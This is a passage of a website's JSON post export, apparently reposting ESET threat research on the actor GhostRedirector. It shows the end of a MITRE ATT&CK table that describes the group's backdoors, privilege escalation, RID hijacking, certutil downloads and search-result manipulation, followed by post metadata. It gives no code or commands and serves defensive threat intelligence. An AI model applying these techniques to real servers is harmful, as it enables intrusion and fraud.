href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1559\" target=\"_blank\" rel=\"noopener\">T1559<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Inter-Process Communication<\/td>\n<td style=\"height: 54px;\" width=\"265\">Comdai can create a pipe to communicate and receive information from another process.<\/td>\n<\/tr>\n<tr style=\"height: 73px;\">\n<td style=\"height: 73px;\" width=\"113\"><strong>Persistence<\/strong><\/td>\n<td style=\"height: 73px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1546\" target=\"_blank\" rel=\"noopener\">T1546<\/a><\/td>\n<td style=\"height: 73px;\" width=\"151\">Event Triggered Execution<\/td>\n<td style=\"height: 73px;\" width=\"265\">Gamshen is loaded by the IIS Worker Process (<span style=\"font-family: courier new, courier, monospace;\">w3wp.exe<\/span>) when the IIS server receives an inbound HTTP request.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 72px;\" rowspan=\"2\" width=\"113\"><strong>Privilege Escalation<\/strong><\/td>\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\" target=\"_blank\" rel=\"noopener\">T1134<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Access Token Manipulation<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can manipulate tokens to perform a local privilege escalation.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1112\" target=\"_blank\" rel=\"noopener\">T1112<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Modify Registry<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can modify a Windows registry key to perform RID hijacking.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 162px;\" rowspan=\"3\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\" target=\"_blank\" rel=\"noopener\">T1027<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obfuscated Files or Information<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector obfuscates its local privilege escalation tools using .NET Reactor.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/009\" target=\"_blank\" rel=\"noopener\">T1027.009<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obfuscated Files or Information: Embedded Payloads<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector embedded webshells into its payloads like Zunput to be dropped on compromised server.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\" target=\"_blank\" rel=\"noopener\">T1140<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses AES in CBC mode to decrypt strings in the backdoor Rungan.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1083\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">File and Directory Discovery<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can use Zunput to list directory content on a victim\u2019s server.<\/td>\n<\/tr>\n<tr style=\"height: 55px;\">\n<td style=\"height: 235px;\" rowspan=\"4\" width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td style=\"height: 55px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1105\" target=\"_blank\" rel=\"noopener\">T1105<\/a><\/td>\n<td style=\"height: 55px;\" width=\"151\">Ingress Tool Transfer<\/td>\n<td style=\"height: 55px;\" width=\"265\">GhostRedirector can abuse the tool <span style=\"font-family: courier new, courier, monospace;\">certutil.exe<\/span> to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1219\" target=\"_blank\" rel=\"noopener\">T1219<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Remote Access Software<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector may use the GoToHTTP tool for connecting remotely to victims.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Application Layer Protocol: Web Protocols<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector relies on HTTP to communicate with the backdoor Rungan.<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1008\" target=\"_blank\" rel=\"noopener\">T1008<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Fallback Channels<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector can deploy the tool GoToHTTP or create malicious users on the compromised server to maintain access.<\/td>\n<\/tr>\n<tr style=\"height: 90px;\">\n<td style=\"height: 90px;\" width=\"113\"><strong>Impact<\/strong><\/td>\n<td style=\"height: 90px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1565\" target=\"_blank\" rel=\"noopener\">T1565<\/a><\/td>\n<td style=\"height: 90px;\" width=\"151\">Data Manipulation<\/td>\n<td style=\"height: 90px;\" width=\"265\">GhostRedirector can modify the response of a compromised server intended for the Google crawler, in attempts to influence search results order.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=ghostredirector-poisons-windows-servers-backdoors-side-potatoes&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>ESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at least 65<\/p>\n","protected":false},"author":1,"featured_media":258,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-257","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/257","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/comments?post=257"}],"version-history":[{"count":0,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/257\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media\/258"}],"wp:attachment":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media?parent=257"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/categories?post=257"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/tags?post=257"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}